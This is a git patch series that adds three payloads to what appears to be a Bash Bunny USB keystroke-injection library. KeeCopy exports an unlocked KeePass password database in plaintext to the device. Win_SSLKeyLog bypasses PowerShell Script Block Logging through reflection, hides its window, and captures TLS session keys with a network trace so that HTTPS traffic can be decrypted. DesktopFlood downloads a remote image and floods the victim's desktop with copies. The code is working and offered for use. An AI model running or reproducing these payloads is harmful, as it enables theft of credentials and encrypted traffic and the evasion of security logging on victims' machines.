From 4c1c8d47cd29923aff907b71740dba0b39bc066e Mon Sep 17 00:00:00 2001 From: Jake Wimmer <67992074+jrwimmer@users.noreply.github.com> Date: Wed, 19 Jan 2022 11:32:58 -0800 Subject: [PATCH 1/4] Initial commit (#484) --- .../library/exfiltration/keecopy/README.md | 33 ++++++ .../library/exfiltration/keecopy/payload.txt | 102 ++++++++++++++++++ 2 files changed, 135 insertions(+) create mode 100644 payloads/library/exfiltration/keecopy/README.md create mode 100644 payloads/library/exfiltration/keecopy/payload.txt diff --git a/payloads/library/exfiltration/keecopy/README.md b/payloads/library/exfiltration/keecopy/README.md new file mode 100644 index 00000000..4166cf2a --- /dev/null +++ b/payloads/library/exfiltration/keecopy/README.md @@ -0,0 +1,33 @@ +# KeePass Automated Exporter + +- Title: KeeCopy +- Author: jrwimmer +- Version: 1.0 +- Target: Windows Vista+ +- Category: Exfiltration + +## Description + +Performs keystroke automation to export an unencrypted copy of an unlocked KeePass database +The copy is saved to the loot folder on the Bash Bunny USB Mass Storage partition + +Important Considerations: + +This script makes the following assumptions. +- The target computer is unlocked +- The target computer has KeePass 2.x installed and running with an unlocked database +- KeePass only has one database open, or the desired database was the last one in focus +- KeePass is using the default "Show KeePass window" hot key of: `Ctrl + Alt + K` + +## Configuration + +Hot key settings and/or script tweaks may be necessary depending on the target system. + +## STATUS + +| LED | Status | +| -------- | ------------------------- | +| STAGE1 | Determine output location | +| STAGE2 | Export database | +| FINISH | Payload complete | + diff --git a/payloads/library/exfiltration/keecopy/payload.txt b/payloads/library/exfiltration/keecopy/payload.txt new file mode 100644 index 00000000..2d3bafb1 --- /dev/null +++ b/payloads/library/exfiltration/keecopy/payload.txt @@ -0,0 +1,102 @@ +#!/bin/bash +# +# Title: KeeCopy +# Description: All-in-one script using keystroke automation to export an unencrypted copy of an unlocked KeePass database. +# The database copy is saved to the loot folder on the Bash Bunny USB Mass Storage partition +# Author: jrwimmer +# Version: 1.0 +# Category: Exfiltration +# Target: Windows Vista+ (PowerShell, clip.exe) +# Attackmodes: HID, Storage +# +# + +################################## +# Options # +################################## + +# KEEPASS_SHOW (DUCKY KEY COMBO) - Specify the hot key combination anticipated to show the KeePass window +KEEPASS_SHOW="CTRL-ALT k" + +# KEEPASS_WAITSAVE (MILLISECONDS) - How long to wait for KeePass to complete the export +KEEPASS_WAITSAVE=5000 + +# POWEROFF_AFTER (Y/N) - Power down the BashBunny upon completion +POWEROFF_AFTER="Y" + + +################################## +# Stage 1: Determine destination # +################################## +LED STAGE1 + +# Activate HID and STORAGE capabilities +ATTACKMODE HID STORAGE + +# Open PowerShell +RUN WIN powershell.exe +QUACK DELAY 2000 + +# Locate the BashBunny volume and store it on the clipboard +QUACK STRING "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \"(gwmi win32_volume -Filter {label='BashBunny'}).Name\" | clip;exit" +QUACK ENTER + +################################## +# Stage 2: Export database # +################################## +LED STAGE2 + +# Open KeePass +QUACK $KEEPASS_SHOW +QUACK DELAY 500 + +# Open the File menu +QUACK ALT f +QUACK DELAY 100 + +# Select "Export" +QUACK e +QUACK DELAY 100 + +# Move focus into the format selector +QUACK TAB +QUACK TAB + +# Skip down to "Customizable HTML File" +QUACK c + +# Move up to "KeePass XML (2.x)" +QUACK UP + +# Move focus to the Destination File field +QUACK TAB + +# Paste the path copied in STAGE1 +QUACK CTRL v + +# Append the rest of the destination path +QUACK STRING "loot\KPDB-$(date +%Y%m%d-%k%M%S).xml" + +# ...and export! +QUACK ENTER + +# Wait for KeePass to complete the export +QUACK DELAY $KEEPASS_WAITSAVE + +################################## +# Cleanup # +################################## +LED CLEANUP + +# Synchronize disks +SYNC + +################################## +# Finish # +################################## +LED FINISH + +# Power off +if [ $POWEROFF_AFTER == "Y" ]; then + halt --poweroff +fi \ No newline at end of file From 95e1d22deed42fd7a0a9aec1a8305abcc9791d62 Mon Sep 17 00:00:00 2001 From: TW-D <75358550+TW-D@users.noreply.github.com> Date: Fri, 21 Jan 2022 19:53:08 -0500 Subject: [PATCH 2/4] Add Win_SSLKeyLog (#485) * Add Win_SSLKeyLog Captures the client network session. Captures the client side session keys. 1) Partially avoids "PowerShell Script Block Logging". 2) Closing of all windows. 3) Hide "PowerShell" window. 4) Check if current process have "Administrator" privilege. 5) Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information. 6) Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)". 7) Writes the file system cache to disk (thanks to @dark_pyrro). 8) Safely eject (thanks to @Night (9o3)). * Correction of some information in "README.md" --- .../credentials/win_sslkeylog/README.md | 63 ++++++++++ .../credentials/win_sslkeylog/payload.ps1 | 58 ++++++++++ .../credentials/win_sslkeylog/payload.txt | 108 ++++++++++++++++++ 3 files changed, 229 insertions(+) create mode 100644 payloads/library/credentials/win_sslkeylog/README.md create mode 100644 payloads/library/credentials/win_sslkeylog/payload.ps1 create mode 100644 payloads/library/credentials/win_sslkeylog/payload.txt diff --git a/payloads/library/credentials/win_sslkeylog/README.md b/payloads/library/credentials/win_sslkeylog/README.md new file mode 100644 index 00000000..26f5e470 --- /dev/null +++ b/payloads/library/credentials/win_sslkeylog/README.md @@ -0,0 +1,63 @@ +# "Microsoft Windows" SSLKEYLOG + +- Title: Win_SSLKeyLog +- Author: TW-D +- Version: 1.0 +- Target: Microsoft Windows +- Category: Credentials + +## Description + +> +> Captures the client network session. +> +> Captures the client side session keys. +> + +1) Partially avoids "PowerShell Script Block Logging". +2) Closing of all windows. +3) Hide "PowerShell" window. +4) Check if current process have "Administrator" privilege. +5) Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information. +6) Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)". +7) Writes the file system cache to disk. +8) Safely eject. + +## Configuration + +From "payload.txt" change the values of the following constants : +```bash + +######## INITIALIZATION ######## + +readonly BB_LABEL="BashBunny" +readonly SNIFFING_TIME=300 + + +``` + +## Required + +Utility that converts an .etl file containing a Windows network packet capture into .pcapng format. +[ETL2PCAPNG](https://github.com/microsoft/etl2pcapng) + +Wireshark network protocol analyzer. +[WIRESHARK](https://www.wireshark.org/) + +## Steps + +Convert "capture.etl" file into "capture.pcapng" with "etl2pcapng". +``` +.\etl2pcapng.exe .\capture.etl .\capture.pcapng +``` + +Open your "capture.pcapng" with "Wireshark". + +Configure "Wireshark" for HTTPS decryption. +``` +Edit - Preferences +Protocols - (SSL and/or TLS) +(Pre)-Master-Secret log filename -> Browse -> SSLKEYLOGFILE.txt +``` + +Happy hunting. diff --git a/payloads/library/credentials/win_sslkeylog/payload.ps1 b/payloads/library/credentials/win_sslkeylog/payload.ps1 new file mode 100644 index 00000000..b0df0e4b --- /dev/null +++ b/payloads/library/credentials/win_sslkeylog/payload.ps1 @@ -0,0 +1,58 @@ +# +# Author: TW-D +# Version: 1.0 +# + +Param ( + [String] $BB_VOLUME, + [Int] $SNIFFING_TIME +) + +# Partially avoids "PowerShell Script Block Logging". +# +$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static") +$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid()) +$etw_provider.SetValue($null, $event_provider) + +# Closing of all windows. +# +Get-Process -Name "explorer" | Stop-Process + +# Hide "PowerShell" window. +# +$Script:showWindowAsync = Add-Type -MemberDefinition @" +[DllImport("user32.dll")] +public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow); +"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru +$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null + +# Check if current process have "Administrator" privilege. +# +If ( ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") ) { + + $bb_loot = "${BB_VOLUME}loot\" + + # Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information. + # + [Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", $null, "User") + [Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", "${bb_loot}SSLKEYLOGFILE.txt", "User") + + # Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)". + # + (NETSH trace start capture=yes report=no persistent=yes traceFile="${bb_loot}capture.etl" maxSize=0 fileMode=append) | Out-Null + Start-Sleep -Seconds $SNIFFING_TIME + (NETSH trace stop) | Out-Null + + [Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", $null, "User") + +} + +"Win_SSLKeyLog terminated." | Out-File -FilePath .\..\..\loot\done.txt -Force + +# Writes the file system cache to disk (thanks to @dark_pyrro). +# +Write-VolumeCache -DriveLetter ("${BB_VOLUME}".Substring(0,1)) + +# Safely eject (thanks to @Night (9o3)). +# +(New-Object -ComObject Shell.Application).Namespace(17).ParseName("${BB_VOLUME}").InvokeVerb("Eject") \ No newline at end of file diff --git a/payloads/library/credentials/win_sslkeylog/payload.txt b/payloads/library/credentials/win_sslkeylog/payload.txt new file mode 100644 index 00000000..1dbcb386 --- /dev/null +++ b/payloads/library/credentials/win_sslkeylog/payload.txt @@ -0,0 +1,108 @@ +#!/bin/bash +# +# Title: Win_SSLKeyLog +# +# Description: +# Captures the client network session. +# Captures the client side session keys. +# +# 1) Partially avoids "PowerShell Script Block Logging". +# 2) Closing of all windows. +# 3) Hide "PowerShell" window. +# 4) Check if current process have "Administrator" privilege. +# 5) Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information. +# 6) Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)". +# 7) Writes the file system cache to disk (thanks to @dark_pyrro). +# 8) Safely eject (thanks to @Night (9o3)). +# +# Author: TW-D +# Version: 1.0 +# Category: Credentials +# Target: Microsoft Windows 10 +# Attackmodes: HID and STORAGE +# +# TESTED ON +# =============== +# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1) +# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1) +# +# REQUIREMENTS +# =============== +# The target user must belong to the 'Administrator' group. +# +# STATUS +# =============== +# Magenta solid ................................... SETUP +# Yellow single blink ............................. ATTACK +# Yellow double blink ............................. STAGE2 +# Yellow triple blink ............................. STAGE3 +# Cyan inverted single blink ...................... SPECIAL +# White fast blink ................................ CLEANUP +# Green 1000ms VERYFAST blink followed by SOLID ... FINISH + +######## INITIALIZATION ######## + +readonly BB_LABEL="BashBunny" +readonly SNIFFING_TIME=300 + +######## SETUP ######## + +LED SETUP + +ATTACKMODE HID STORAGE +GET SWITCH_POSITION +udisk mount + +######## ATTACK ######## + +LED ATTACK + +Q DELAY 5000 +Q GUI r +Q DELAY 5000 +Q STRING "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass" +Q DELAY 1500 +Q CTRL-SHIFT ENTER +Q DELAY 5000 +Q LEFTARROW +Q DELAY 3000 +Q ENTER +Q DELAY 7000 + +LED STAGE2 + +Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)\"" +Q ENTER +Q DELAY 3500 + +Q STRING "\$BB_SWITCH = \"\${BB_VOLUME}payloads\\${SWITCH_POSITION}\\\"" +Q ENTER +Q DELAY 1500 + +Q STRING "CD \"\${BB_SWITCH}\"" +Q ENTER +Q DELAY 1500 + +LED STAGE3 + +Q STRING ".\payload.ps1 -BB_VOLUME \"\${BB_VOLUME}\" -SNIFFING_TIME ${SNIFFING_TIME}" +Q ENTER +Q DELAY 1500 + +LED SPECIAL + +until [ -f /root/udisk/loot/done.txt ]; do sleep 10; sync; done + +######## CLEANUP ######## + +LED CLEANUP + +rm /root/udisk/loot/done.txt +sync +udisk unmount + +######## FINISH ######## + +LED FINISH + +shutdown -h 0 \ No newline at end of file From f5292aa8cebfdf56b233907be7e2afa8f87dbfd5 Mon Sep 17 00:00:00 2001 From: JustaProgrammer9 <95446075+JustaProgrammer9@users.noreply.github.com> Date: Fri, 21 Jan 2022 20:02:26 -0500 Subject: [PATCH 3/4] Desktop flooder (#479) * Desktop Flooder downloads an image from a link and saves it, then copies the images all over the desktop. * Update README.md * Update README.md * Update README.md * Update payload.txt --- payloads/library/prank/DesktopFlood/README.md | 13 ++++++ .../library/prank/DesktopFlood/payload.txt | 46 +++++++++++++++++++ 2 files changed, 59 insertions(+) create mode 100644 payloads/library/prank/DesktopFlood/README.md create mode 100644 payloads/library/prank/DesktopFlood/payload.txt diff --git a/payloads/library/prank/DesktopFlood/README.md b/payloads/library/prank/DesktopFlood/README.md new file mode 100644 index 00000000..9602cb8c --- /dev/null +++ b/payloads/library/prank/DesktopFlood/README.md @@ -0,0 +1,13 @@ +# DesktopFlood +Floods the desktop with a image of your choice + +## Configuration +Image Link, Image Name, Amount of Images. Bluetooth if you want, in Setup + +## LED + +| COLOR | DESCRIPTION | +|---------|-------------| +| White | Setup/Wait | +| Yellow | Attacking | +| Green | Finished | diff --git a/payloads/library/prank/DesktopFlood/payload.txt b/payloads/library/prank/DesktopFlood/payload.txt new file mode 100644 index 00000000..0ab24c96 --- /dev/null +++ b/payloads/library/prank/DesktopFlood/payload.txt @@ -0,0 +1,46 @@ +#!/bin/bash +# +# Title: Desktop Flood +# Description: Floods desktop with image it downloads from link +# Author: JustaProgrammer9 +# Category: Prank +# Target: Windows +# Attackmodes: HID +# + +#--// CONFIG \\--# + +#removing [ https:// ] can help keep command below runbox character limit + +ImageLink='i.ytimg.com/vi/7yN0g2QIJSU/maxresdefault.jpg' + +ImageName="Gift" + +Amount=50 + + +####--// SETUP \\--#### + +LED W + +ATTACKMODE HID + +#--> FOR BLUETOOTH <--# + +#WAIT_FOR_PRESENT YourDevice +#WAIT_FOR_NOT_PRESENT YourDevice + + +#--// ATTACK \\--# + +LED Y + +RUN WIN "cmd /c powershell \"curl $ImageLink -O C:\Users\%USERNAME%\Desktop\$ImageName.jpg;sleep 1;1..$Amount | % { copy-Item \"C:\Users\%USERNAME%\desktop\$ImageName.jpg\" \"C:\Users\%USERNAME%\desktop\$ImageName\$_.jpg\"}\"" + +Q ENTER + + +####--// DONE \\--#### + +LED G + From fab14668969ff720cd3cfea30cb5b50c38598e3c Mon Sep 17 00:00:00 2001 From: JustaProgrammer9 <95446075+JustaProgrammer9@users.noreply.github.com> Date: Mon, 24 Jan 2022 14:28:25 -0500 Subject: [PATCH 4/4] so it actually works (#486) I foolishly forgot to add a second backslash to $ImageName --- payloads/library/prank/DesktopFlood/payload.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/prank/DesktopFlood/payload.txt b/payloads/library/prank/DesktopFlood/payload.txt index 0ab24c96..bc13e6be 100644 --- a/payloads/library/prank/DesktopFlood/payload.txt +++ b/payloads/library/prank/DesktopFlood/payload.txt @@ -35,7 +35,7 @@ ATTACKMODE HID LED Y -RUN WIN "cmd /c powershell \"curl $ImageLink -O C:\Users\%USERNAME%\Desktop\$ImageName.jpg;sleep 1;1..$Amount | % { copy-Item \"C:\Users\%USERNAME%\desktop\$ImageName.jpg\" \"C:\Users\%USERNAME%\desktop\$ImageName\$_.jpg\"}\"" +RUN WIN "cmd /c powershell \"curl $ImageLink -O C:\Users\%USERNAME%\Desktop\\$ImageName.jpg;sleep 1;1..$Amount | % { copy-Item \"C:\Users\%USERNAME%\desktop\\$ImageName.jpg\" \"C:\Users\%USERNAME%\desktop\\$ImageName\$_.jpg\"}\"" Q ENTER